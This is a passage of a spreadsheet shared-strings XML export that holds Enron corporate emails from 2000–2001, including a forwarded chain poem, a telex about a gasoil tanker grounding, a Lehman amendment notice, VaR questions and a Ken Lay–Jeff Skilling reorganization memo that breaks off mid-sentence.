    <t>Re: Brand New Vavrek</t>
  </si>
  <si>
    <t>Congratulations.  Glad to hear all went well (save the emergency C-section).  _x000D_
See you soon._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Thu, 30 Mar 2000 23:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'thurmond@uniteddc.com', 'suhernan@llgm.com'})</t>
  </si>
  <si>
    <t>Fwd: FW: A POEM FOR THE F-A-M-I-L-Y</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Judy Hernandez/HOU/ECT on 03/31/2000 _x000D_
07:38 AM ---------------------------_x000D_
_x000D_
_x000D_
Regina Blackshear@ENRON_x000D_
03/30/2000 04:59 PM_x000D_
To: vblack4538@aol.com, sonia_l_castorena@reliantenergy.com, _x000D_
Amber.Ebow@enron.com, Tammy Green &lt;tcgreen@flash.net&gt;, GRHRDH@aol.com, _x000D_
jacelyne hill &lt;YELLOWGIRLHILL@netscape.net&gt;, rhondamjordan@hotmail.com, _x000D_
"BENEDICT PETERS"&lt;bouncing98@hotmail.com&gt;, rosemary.a.reynolds@usa.xerox.com, _x000D_
"WhiteBL(Barbara)"&lt;BLWhite@equiva.com&gt;, Yvonne Acosta/Corp/Enron@ENRON, _x000D_
Michelle Neville/HOU/ECT@ECT, Eve Puckett/Corp/Enron@ENRON, Judy _x000D_
Hernandez/HOU/ECT@ECT, Shirlet Williams/HOU/ECT@ECT, Tharsilla _x000D_
Broussard/HR/Corp/Enron@ENRON, John Whiting/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Fwd: FW: A POEM FOR THE F-A-M-I-L-Y_x000D_
_x000D_
this is nice_x000D_
---------------------- Forwarded by Regina Blackshear/Corp/Enron on _x000D_
03/30/2000 03:55 PM ---------------------------_x000D_
_x000D_
_x000D_
"LaTonya Carter" &lt;l_carter61@hotmail.com&gt; on 03/30/2000 03:49:07 PM_x000D_
To: anthonya@risecom.net, dana62_@hotmail.com, regina.blackshear@enron.com, _x000D_
music@axs4u.net, DBUAKA1998@aol.com, v_ashford@hotmail.com_x000D_
cc:  _x000D_
_x000D_
Subject: Fwd: FW: A POEM FOR THE F-A-M-I-L-Y_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;From: "Alvita McKinney" &lt;vitamae47@hotmail.com&gt;_x000D_
&gt;To: queen33@hotmail.com, fdeary@hotmail.com, derexw@hotmail.com,_x000D_
&gt;l_carter61@hotmail.com, asmith@pwe.ci.houston.tx.us,_x000D_
&gt;fbrown@pwe.ci.houston.tx.us, ckizzee@pwe.ci.houston.tx.us, deiedre@usa.com,_x000D_
&gt;sweetmama_nicey@hotmail.com, dishonest19@hotmail.com, c-traylor@ti.com,_x000D_
&gt;asiaabdullah@ProdigyBiz.net, Karibbean@excite.com, valliar2000@yahoo.com,_x000D_
&gt;lewisf@TIRR.TMC.EDU, Juan_Johnson@hotmail.com, Onlysexylady@aol.com,_x000D_
&gt;KalimahAbdullah@PZLQS.com, dmukes@pwe.ci.houston.tx.us,_x000D_
&gt;suebeehoney25@hotmail.com_x000D_
&gt;Subject: Fwd: FW: A POEM FOR THE F-A-M-I-L-Y_x000D_
&gt;Date: Thu, 30 Mar 2000 09:43:54 CST_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;&gt;&gt;ENJOY THIS READING._x000D_
&gt;&gt;_x000D_
&gt;&gt;&gt;A POEM FOR THE F-A-M-I-L-Y_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt; &gt; I ran into a stranger as he passed by._x000D_
&gt;&gt;&gt; &gt; "Oh, excuse me please" was my reply._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; He said, "Please excuse me too;_x000D_
&gt;&gt;&gt; &gt; wasn't even watching for you."_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; We were very polite, this stranger and I._x000D_
&gt;&gt;&gt; &gt; We went on our way and we said good-bye._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; But at home a different story is told,_x000D_
&gt;&gt;&gt; &gt; How we treat our loved ones, young and old._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; Later that day, cooking the evening meal,_x000D_
&gt;&gt;&gt; &gt; My daughter stood beside me very still._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; When I turned, I nearly knocked her down._x000D_
&gt;&gt;&gt; &gt; "Move out of the way," I said with a frown._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; She walked away, her little heart broken._x000D_
&gt;&gt;&gt; &gt; I didn't realize how harshly I'd spoken._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; While I lay awake in bed,_x000D_
&gt;&gt;&gt; &gt; God's still small voice came to me and said,_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; "While dealing with a stranger, common courtesy you use,_x000D_
&gt;&gt;&gt; &gt; But the children you love, you seem to abuse._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; Look on the kitchen floor,_x000D_
&gt;&gt;&gt; &gt; You'll find some flowers there by the door._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; Those are the flowers she brought for you._x000D_
&gt;&gt;&gt; &gt; She picked them herself, pink, yellow and blue._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; She stood quietly not to spoil the surprise,_x000D_
&gt;&gt;&gt; &gt; and you never saw the tears in her eyes."_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; By this time, I felt very small_x000D_
&gt;&gt;&gt; &gt; and now my tears began to fall._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; I quietly went and knelt by her bed;_x000D_
&gt;&gt;&gt; &gt; "Wake up, little girl, wake up," I said._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; "Are these the flowers you picked for me?"_x000D_
&gt;&gt;&gt; &gt; She smiled, "I found 'em, out by the tree._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; I picked 'em because they're pretty like you._x000D_
&gt;&gt;&gt; &gt; I knew you'd like 'em, especially the blue."_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; I said, "Daughter, I'm sorry for the way I acted today;_x000D_
&gt;&gt;&gt; &gt; I shouldn't have yelled at you that way."_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; She said, "Oh, Mom, that's okay. I love you anyway."_x000D_
&gt;&gt;&gt; &gt; I said, "Daughter, I love you too,_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; and I do like the flowers, especially the blue."_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; ====================================================_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; Are you aware that:_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; If we die tomorrow, the company that we are working for could easily_x000D_
&gt;&gt;&gt; &gt; replace us in a matter of days. But the family we left behind will_x000D_
&gt;&gt;&gt;feel_x000D_
&gt;&gt;&gt; &gt; the loss for the rest of their lives. And come to think of it, we pour_x000D_
&gt;&gt;&gt; &gt; ourselves more into work than to our family - an unwise investment_x000D_
&gt;&gt;&gt; &gt; indeed. So what is behind the story?_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; You know what is the full word of family?_x000D_
&gt;&gt;&gt; &gt; FAMILY = (F)ATHER (A)ND (M)OTHER, (I) (L)OVE (Y)OU ?_x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; It is worthwhile to share more time with them as they are getting_x000D_
&gt;&gt;&gt;older._x000D_
&gt;&gt;&gt; &gt; Make balance among all things._x000D_
&gt;&gt;&gt; &gt;_x000D_
&gt;&gt;&gt; &gt; Fill life with love and bravery and we shall live a life uncommon._x000D_
&gt;&gt;_x000D_
&gt;_x000D_
_x000D_
_______________________________________________________x000D_
Get Your Private, Free Email at http://www.hotmail.com_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 23:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: MT BRAGE PACIFIC - GASOIL</t>
  </si>
  <si>
    <t xml:space="preserve">Anything more on this?_x000D_
_x000D_
_x000D_
_x000D_
	Alan Aronowitz_x000D_
	05/29/2001 11:49 AM_x000D_
		 _x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT, Richard B Sanders/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: FW: MT BRAGE PACIFIC - GASOIL_x000D_
_x000D_
FYI._x000D_
----- Forwarded by Alan Aronowitz/HOU/ECT on 05/29/2001 11:48 AM -----_x000D_
_x000D_
	Robert Quick/Enron@EUEnronXGate_x000D_
	05/29/2001 11:33 AM_x000D_
		 _x000D_
		 To: Alan Aronowitz/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: FW: MT BRAGE PACIFIC - GASOIL_x000D_
_x000D_
this came in today pm. No spillage as such. I will forward 2 other related _x000D_
emails. tks _x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Nicholson, Andre  _x000D_
Sent: 29 May 2001 14:16_x000D_
To: Earnest, Scott; Sweeney, Kevin; Nowlan Jr., John L.; Harrison, John H.; _x000D_
Gasper, Michael J.; Price, Brent A._x000D_
Cc: Quick, Robert; Horn, Cindy; Ted Rosen; Mostura, Sylvie; Makinen, Maarit; _x000D_
Mahoney, Chris; Koller, Ross_x000D_
Subject: MT BRAGE PACIFIC - GASOIL_x000D_
_x000D_
Just a short note to you all advising that the vessel MT Brage Pacific ( _x000D_
Enron charter - from Ventspils to Rotterdam) carrying Gasoil grounded today._x000D_
_x000D_
The telex message below is self explanatory but please advise if you require _x000D_
any further information at this stage._x000D_
_x000D_
I will keep you all informed when further details are received._x000D_
_x000D_
Thanks and Regards_x000D_
Andre_x000D_
Telephone No + 44 20 7783 5429_x000D_
Fax No               + 44 20 7783 8062 _x000D_
_x000D_
_x000D_
_x000D_
London Telex_x000D_
29/05/2001 13:20_x000D_
To: ECT LONDON TELEX INCOMING_x000D_
cc:  _x000D_
_x000D_
Subject: Telex, 8813609 LONMAR G &lt;XTA_6609&gt; TLX01_x000D_
_x000D_
MSG NO. XTA 6609 01/05/29 12:50 _x000D_
_x000D_
_x000D_
922465 ENRON G_x000D_
8813609 LONMAR G_x000D_
_x000D_
_x000D_
FROM :  BRAEMAR_x000D_
DATE :  29/05/2001_x000D_
TIME :  13:28:48_x000D_
REF  :  NH4511797_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
ATTENTION MAARIT_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
URGENT     URGENT_x000D_
_x000D_
FOLLOWING RECD FROM OWNERS_x000D_
_x000D_
REF: M/T BRAGE PACIFIC/ENRON C/P DD 23.MAY_x000D_
2001                       16,059.900 MT  GASOIL VENTSPILS/ROTTERDAM_x000D_
FOR ORDERS_x000D_
------------_x000D_
_x000D_
WE REGRET TO ADVISE THAT VESSEL GROUNDED AT SAMSOE BELT IN POSITION_x000D_
N 55 DEG 53,9 MIN, E 10 DEG 56,5 AT 11:45 HRS TODAY._x000D_
_x000D_
WE HAVE INFORMED NORWEGIAN AND DANISH AUTHORITIES.  THERE IS NO_x000D_
SPILL FROM THE VESSEL AND SHE IS NOT TAKING WATER._x000D_
_x000D_
THE BOTTOM WHERE SHE GROUNDED IS OF SAND/MUD, AND WE WILL TRY TO_x000D_
GET HER AFLOAT AGAIN AT HIGH WATER, 19:27 HRS TONIGHT._x000D_
WE HAVE CONTACTED TUG COMPANIES AND EXPECT A TUG TO ARRIVE THIS_x000D_
EVENING.  THE WIND/SEA IS CALM IN THE AREA._x000D_
_x000D_
WE MAY HAVE TO TRANSFER SOME OF THE CARGO TO ANOTHER VESSEL_x000D_
IN ORDER TO GET BRAGE PACIFIC AFLOAT, BUT THIS WILL ONLY BE KNOWN_x000D_
TONIGHT._x000D_
_x000D_
WE WILL REVERT WITH MORE INFORMATION TOMORROW AM._x000D_
_x000D_
REGARDS,_x000D_
SEATRANS ERMEFER TANKERS, BERGEN/NORWAY_x000D_
GUNNAR SOLBERG_x000D_
_x000D_
_x000D_
REGARDS_x000D_
N. HARDAKER_x000D_
BRAEMAR MARITIME LTD_x000D_
AS BROKERS ONLY_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
NNNN_x000D_
_x000D_
_x000D_
8813609 LONMAR G_x000D_
922465 ENRON G_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 Oct 2001 12:32:08 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron put amendment notice</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Please execute before 4 pm and fax back to 646-758-4819._x000D_
&gt;  &lt;&lt;Confirm modification r1.doc&gt;&gt;_x000D_
&gt;_x000D_
Russell F. Hackmann, CFA_x000D_
Lehman Brothers Corporate Equity Derivatives_x000D_
(201) 524-2279 phone_x000D_
(917) 596-2936 cell_x000D_
rhackman@lehman.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
This message is intended only for the personal and confidential use of the designated recipient(s) named above.  If you are not the intended recipient of this message you are hereby notified that any review, dissemination, distribution or copying of this message is strictly prohibited.  This communication is for information purposes only and should not be regarded as an offer to sell or as a solicitation of an offer to buy any financial product, an official confirmation of any transaction, or as an official statement of Lehman Brothers.  Email transmission cannot be guaranteed to be secure or error-free.  Therefore, we do not represent that this information is complete or accurate and it should not be relied upon as such.  All information is subject to change without notice._x000D_
_x000D_
_x000D_
 - Confirm modification r1.doc </t>
  </si>
  <si>
    <t>Wed, 26 Jul 2000 04:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cantekin.dincerler@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Vince,_x000D_
Sorry for getting back a little late. I have been in touch with Kirstee to _x000D_
figure out how to treat positions data which is the primary cause for _x000D_
fluctuations. Apparently, as of 7/19, MG still has July position. This may be _x000D_
spot or balance of the month, or some settlement issue. This indeed is what _x000D_
we are trying to find out/verify (it may be an error too). Kirstee is going _x000D_
to get back to me on this. If it is not an error, then Anjam's latest results _x000D_
($5.5 million total VAR) are reasonable given all the assumptions and the _x000D_
missing pieces. I will keep you posted._x000D_
Cantekin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
07/26/2000 10:12 AM_x000D_
To: Cantekin Dincerler/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, Ted Murphy/HOU/ECT@ECT _x000D_
Subject: Re:  _x000D_
_x000D_
Cantekin,_x000D_
_x000D_
Can you figure out the reason for cocoa beans VaR fluctuations?_x000D_
The same is true of aluminum. I assume this is the position change._x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
Cantekin Dincerler_x000D_
07/26/2000 09:28 AM_x000D_
To: Anjam Ahmad/LON/ECT@ECT, Kirstee Hewitt/LON/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: _x000D_
_x000D_
Anjam and Kirstee,_x000D_
_x000D_
_x000D_
As I have suspected the position as of 6/30 vs 7/19 makes the difference. The _x000D_
first table first column is my VAR number with 6/30 position and gold&amp;silver _x000D_
prices, the second column is your VAR with 7/19 position and dummy _x000D_
gold&amp;silver prices. The second table first column is my VAR with 7/19 _x000D_
position and 6/30 gold&amp;silver prices, the second column is as before._x000D_
_x000D_
I would ask you to plug the gold and silver prices and see what kind of _x000D_
numbers you get in order to verify we are on the same page. Please refer to _x000D_
MODELVAR2000.xls that I have sent you for gold &amp; silver prices and _x000D_
volatilities. _x000D_
_x000D_
Thank you,_x000D_
Cantekin_x000D_
_x000D_
_x000D_
  TABLE 1_x000D_
_x000D_
_x000D_
_x000D_
  TABLE 2_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Re: Power Generation Question</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Gillette,_x000D_
_x000D_
The heat rate is going to depend on the type of fuel and the construction _x000D_
date of the unit.  Unfortunately, most of that info is proprietary.  _x000D_
_x000D_
Chris Gaskill is the head of our fundamentals group and he might be able to _x000D_
supply you with some of the guidelines._x000D_
_x000D_
-Bass_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Lisa Gillette                           04/05/2001 02:31 PM_x000D_
	_x000D_
_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Power Generation Question_x000D_
_x000D_
Hey Bass,_x000D_
_x000D_
I have a question and I am hoping you can help me.  I am wanting to compile a _x000D_
list of all the different types of power plants and their respective heat _x000D_
rates to determine some sort of generation ratio._x000D_
_x000D_
i.e. Coal  4 mmbtu = 1 MW_x000D_
 Simple Cycle 11 mmbtu = 1 MW_x000D_
_x000D_
Please let me know if you can help me or point me to someone who can.  Just _x000D_
FYI...Bryan suggested that I call you so blame him as you curse me under your _x000D_
breath right now._x000D_
_x000D_
Thanks,_x000D_
Lisa_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 25 Nov 2001 06:59:16 -0800 (PST)</t>
  </si>
  <si>
    <t>Blackberry Outage</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Attention Blackberry User:_x000D_
_x000D_
You are receiving this notification to alert you that e-mail services to your Blackberry device will be unavailable between the hours of  8:45 a.m. and 12 midnight CST on Sunday, November 25th for maintenance.  During this outage, email services to the Blackberry handheld will be interrupted, however, pin-to-pin paging will not be affected.  If you have additional questions regarding this outage, please contact the North American Resolution Center at 713-853-1411._x000D_
_x000D_
Thanks for your cooperation and understanding,_x000D_
_x000D_
Enron Global Messaging</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 10:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'eddy.daniels@bakerbotts.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Richard B Sanders/HOU/ECT on 11/27/2000 06:54 PM -----_x000D_
_x000D_
=09Ken Lay and Jeff Skilling@ENRON_x000D_
=09Sent by: Enron Announcements@ENRON_x000D_
=0911/08/2000 04:59 PM_x000D_
=09=09=20_x000D_
=09=09 To: All Enron Worldwide_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Organizational Changes_x000D_
_x000D_
We are making a number of significant organizational changes.  These change=_x000D_
s=20_x000D_
are intended to accomplish four key objectives:_x000D_
_x000D_
First, we need to realign all our wholesale businesses around the successfu=_x000D_
l=20_x000D_
business model developed over the last decade in North America and Europe. =_x000D_
=20_x000D_
This model relies on extensive physical and transactional networks built=20_x000D_
around a relatively small strategic asset position._x000D_
_x000D_
Second, we need to significantly streamline corporate reporting=20_x000D_
relationships.  Particularly with Joe Sutton=01,s departure, the ability to=_x000D_
=20_x000D_
directly manage the day-to-day activities of 15 independent business units=_x000D_
=20_x000D_
has become increasingly difficult._x000D_
_x000D_
Third, we need to accomplish these changes without, in any way, compromisin=_x000D_
g=20_x000D_
the ongoing profitability of all our businesses and without delaying or=20_x000D_
hindering our effort to monetize a significant portion of our lower-yieldin=_x000D_
g=20_x000D_
asset positions._x000D_
_x000D_
And fourth, as always, we need to take advantage of the reorganization to=_x000D_
=20_x000D_
redeploy our talent into our highest value opportunities._x000D_
_x000D_
ENRON WHOLESALE SERVICES_x000D_
_x000D_
Today, we are forming Enron Wholesale Services (EWS) which will consolidate=_x000D_
=20_x000D_
our global wholesale businesses.  The closer alignment of our wholesale=20_x000D_
businesses will accomplish the following: (1) enhanced communication and=20_x000D_
coordination across business units, (2) more rapid deployment of people to=_x000D_
=20_x000D_
higher valued opportunities, (3) more effective prioritization of=20_x000D_
opportunities across the wholesale business, and (4) more rapid extension o=_x000D_
f=20_x000D_
Enron=01,s wholesale business model and capabilities into new industries an=_x000D_
d=20_x000D_
markets._x000D_
_x000D_
Enron Wholesale Services will include our current North American, European=_x000D_
=20_x000D_
(including Japan and Australia), Global Markets, and Industrial Markets=20_x000D_
operations, and will be expanded to include Enron=01,s Net Works business u=_x000D_
nit=20_x000D_
as well as a new unit =01) Enron Global Assets.  In addition, Enron=01,s me=_x000D_
rchant=20_x000D_
businesses outside of North America and Europe will be integrated into this=_x000D_
=20_x000D_
new structure as described below._x000D_
_x000D_
Mark Frevert, currently Chairman of each of our wholesale units, will assum=_x000D_
e=20_x000D_
the role of Chairman and CEO of Enron Wholesale Services.  Greg Whalley,=20_x000D_
currently Chairman and CEO of Enron Net Works, will join Mark in the Office=_x000D_
=20_x000D_
of the Chairman as President and Chief Operating Officer._x000D_
_x000D_
Providing further impetus for these organizational changes, several of our=_x000D_
=20_x000D_
international business unit leaders have elected to move into new leadershi=_x000D_
p=20_x000D_
positions:_x000D_
_x000D_
Rebecca McDonald, currently CEO of Enron APACHI, will join EWS as President=_x000D_
=20_x000D_
and CEO of Enron Global Assets. Enron Global Assets will have responsibilit=_x000D_
y=20_x000D_
for managing all of Enron=01,s existing energy asset portfolio outside of N=_x000D_
orth=20_x000D_
America and Europe.  Joining Rebecca in the Office of the Chairman as COO=_x000D_
=20_x000D_
will be Jim Hughes, currently COO of Enron APACHI.  Rebecca and Jim will=20_x000D_
report to the EWS Office of the Chairman._x000D_
_x000D_
Sanjay Bhatnagar, currently CEO of Enron India, has joined EBS as CEO for t=_x000D_
he=20_x000D_
Middle East and Asia region.  Sanjay will be responsible for building our=_x000D_
=20_x000D_
broadband business in this region and the current EBS team in this region=_x000D_
=20_x000D_
will report to Sanjay.  In this role, Sanjay will report to the EBS office =_x000D_
of=20_x000D_
the Chairman.  In addition, Sanjay will continue to remain responsible for=_x000D_
=20_x000D_
Enron=01,s wholesale energy business in India and will transition this busi=_x000D_
ness=20_x000D_
into Enron Global Assets in the near future._x000D_
=20_x000D_
Diomedes Christodoulou, currently Co-CEO of Enron South America, has joined=_x000D_
=20_x000D_
EBS as Chief Commercial Officer.  Diomedes will be located in London and wi=_x000D_
ll=20_x000D_
focus his origination activities on global opportunities, with near term=20_x000D_
attention to the wholesale and enterprise sectors.  Diomedes will report to=_x000D_
=20_x000D_
the EBS Office of the Chairman._x000D_
_x000D_
Jim Bannantine, currently Co-CEO of Enron South America, will be joining EE=_x000D_
S=20_x000D_
to lead EES=01, commercial efforts outside North America and Europe.  In or=_x000D_
der=20_x000D_
to ensure a smooth transition for our South American businesses and to=20_x000D_
facilitate our asset sales activities, Jim will remain in South America for=_x000D_
=20_x000D_
at least the next several months and continue to serve as CEO of Enron Sout=_x000D_
h=20_x000D_
America.  Throughout the transition, Jim will report to Cliff Baxter and to=_x000D_
=20_x000D_
the Office of the Chairman of Enron Wholesale Services.  Following the=20_x000D_
transition, Jim will join EES._x000D_
_x000D_
In addition to these changes in our international asset operations=20_x000D_
activities, we are making the following changes in our merchant wholesale=_x000D_
=20_x000D_
businesses and the commercial support functions:_x000D_
_x000D_
Enron Net Works_x000D_
Louise Kitchen will assume Greg=01,s previous responsibilities as President=_x000D_
 and=20_x000D_
CEO of Enron Net Works, reporting into Mark and Greg. =20_x000D_
_x000D_
Enron Americas_x000D_
Concurrent with the transfer to Enron Global Assets of responsibility for=_x000D_
=20_x000D_
operating Enron=01,s South and Central America asset base, all trading,=20_x000D_
marketing, and new asset development activities in these regions will repor=_x000D_
t=20_x000D_
into a new entity, Enron Americas.  Enron Americas will have responsibility=_x000D_
=20_x000D_
for all wholesale merchant businesses across North, Central and South=20_x000D_
America.  Dave Delainey, President and CEO, and John Lavorato, Chief=20_x000D_
Operating Officer will comprise the Office of the Chairman for Enron=20_x000D_
Americas._x000D_
_x000D_
Enron Europe_x000D_
The Enron Europe organization, which includes Enron=01,s businesses in Aust=_x000D_
ralia=20_x000D_
and Japan, and Enron Metals, remains unchanged under the leadership of John=_x000D_
=20_x000D_
Sherriff, President and CEO, and Michael Brown, Chief Operating Officer._x000D_
_x000D_
Enron Global Markets_x000D_
Enron Global Markets, under the leadership of Mike McConnell, President and=_x000D_
=20_x000D_
CEO, and Jeff Shankman, Chief Operating Officer, will continue to have=20_x000D_
responsibility for Enron=01,s Middle East and LNG operations.  With the=20_x000D_
exception of Ecoelectrica in Puerto Rico, all operating power plants and=20_x000D_
associated personnel in the Caribbean and Central America will transfer to=_x000D_
=20_x000D_
Enron Global Assets.  Enron Global Markets will also continue to manage the=_x000D_
=20_x000D_
commodity businesses in crude and products, coal, weather, insurance,=20_x000D_
equities, interest rates, foreign exchange, and agricultural products._x000D_
_x000D_
Enron Industrial Markets_x000D_
Enron Industrial Markets=01, organization, under the leadership of Jeff McM=_x000D_
ahon,=20_x000D_
President &amp; CEO, and Ray Bowen, Chief Operating Officer, remains unchanged._x000D_
_x000D_
Commercial Support for EWS_x000D_
The commercial support functions for EWS will remain with, and be managed b=_x000D_
y,=20_x000D_
the individual business units.  We are creating no incremental overhead in=_x000D_
=20_x000D_
the creation of EWS, and in fact hope to reduce our operating costs by more=_x000D_
=20_x000D_
efficient utilization and sharing of resources across EWS._x000D_
_x000D_
To this end we have asked several people to take on an expanded role across=_x000D_
=20_x000D_
EWS in addition to their ongoing roles within their business units.  These=_x000D_
=20_x000D_
newly defined roles are as follows:_x000D_
_x000D_
Mid and Back Office Operations =01) Sally Beck will lead Mid and Back Offic=_x000D_
e=20_x000D_
Operations across EWS.  These services will become part of Enron Net Works,=_x000D_
=20_x000D_
with Sally reporting to Louise Kitchen and Rick Causey, Executive Vice=20_x000D_
President and Chief Accounting Officer.  This alignment creates a coordinat=_x000D_
ed=20_x000D_
services organization with IT and e-commerce platforms to support the=20_x000D_
wholesale businesses and to maximize opportunities to commercialize these=_x000D_
=20_x000D_
services.  Mid and Back Office services for all commercial activities will=_x000D_
=20_x000D_
continue to be organized with dedicated operations controllers responsible=_x000D_
=20_x000D_
for specific commodities and/or geographic locations._x000D_
Legal =01) Mark Haedicke will serve in the role of General Counsel for EWS._x000D_
Regulatory and Government Affairs =01) This function will remain organized =_x000D_
on a=20_x000D_
regional basis.  Rick Shapiro will support all EWS businesses operating in=_x000D_
=20_x000D_
the Americas, and Mark Schroeder, who is based in London, will support all=_x000D_
=20_x000D_
European and Eastern Hemisphere operations.  Rick and Mark will also contin=_x000D_
ue=20_x000D_
to support all other Enron businesses operating in their respective regions=_x000D_
=20_x000D_
and will continue to report to Steve Kean, Executive Vice President and Chi=_x000D_
ef=20_x000D_
of Staff._x000D_
Public Relations =01) This function is also organized primarily on a region=_x000D_
al=20_x000D_
basis.  Eric Thode will have responsibility for North American activity,=20_x000D_
Enron Net Works, and Enron Industrial Markets.  Jackie Gentle will continue=_x000D_
=20_x000D_
in her role for Enron Europe (including Japan and Australia) and John Amble=_x000D_
r=20_x000D_
will have responsibility for activity outside North America and Europe as=_x000D_
=20_x000D_
well as providing support for Enron Global Markets and Enron Global Assets.=_x000D_
 =20_x000D_
These individuals will also continue to have a split reporting relationship=_x000D_
=20_x000D_
to Mark Palmer, Vice President of Communications._x000D_
Business Analysis and Reporting =01) Wes Colwell will expand his role to co=_x000D_
ver=20_x000D_
EWS reporting in addition to his current role in North America._x000D_
_x000D_
Attached for your review is an organization chart for Enron Wholesale=20_x000D_
Services which summarizes the changes described here.  As this organization=_x000D_
=20_x000D_
continues to evolve we will keep you informed of any additional changes._x000D_
_x000D_
ENRON GLOBAL EXPLORATION AND PRODUCTION_x000D_
AND ENRON WIND_x000D_
_x000D_
 As part of our company-wide initiative to examine our assets and investmen=_x000D_
ts=20_x000D_
around the world, we are considering a variety of options with respect to=_x000D_
=20_x000D_
EGEP and EWC.  As a consequence, we are putting these businesses under Clif=_x000D_
f=20_x000D_
Baxter=01,s direction.  Jeff Sherrick, CEO of EGEP, and Jim Noles, CEO of E=_x000D_
nron=20_x000D_
Wind, will report to Cliff._x000D_
_x000D_
CORPORATE STAFF_x000D_
_x000D_
 We are consolidating the corporate staff functions: Human Resources,=20_x000D_
Government Affairs, Public Relations/Communications and Administration.  In=_x000D_
=20_x000D_
that regard, Cindy Olson, Executive Vice President of Human Resources and=_x000D_
=20_x000D_
Community Relations, will report to Steve Kean, Executive Vice President an=_x000D_
d=20_x000D_
Chief of Staff._x000D_
_x000D_
COMMITTEE STRUCTURE_x000D_
_x000D_
 In light of the increased leadership opportunities created by Enron=01,s=_x000D_
=20_x000D_
growth, the Executive Committee will be expanded to include more of our=20_x000D_
business unit leaders.  The primary role of this committee will continue to=_x000D_
=20_x000D_
be the communication of relevant information across Enron=01,s businesses a=_x000D_
nd=20_x000D_
the coordination of activities across those businesses.  We will also be=20_x000D_
drawing on this group to lead company-wide initiatives such as the=20_x000D_
performance review process and evaluation and creation of new businesses. =_x000D_
=20_x000D_
The Executive Committee membership is shown on the attached list._x000D_
_x000D_
 We are also forming a new committee =01) the Enron Corporate Policy Commit=_x000D_
tee. =20_x000D_
This group will be responsible for overall corporate policy, personnel=20_x000D_
management policy and corporate strategy.  The Enron Corporate Policy=20_x000D_
Committee membership is also shown on the attached list._x000D_
_x000D_
 We are confident that these changes will align our talent and our capital =_x000D_
to=20_x000D_
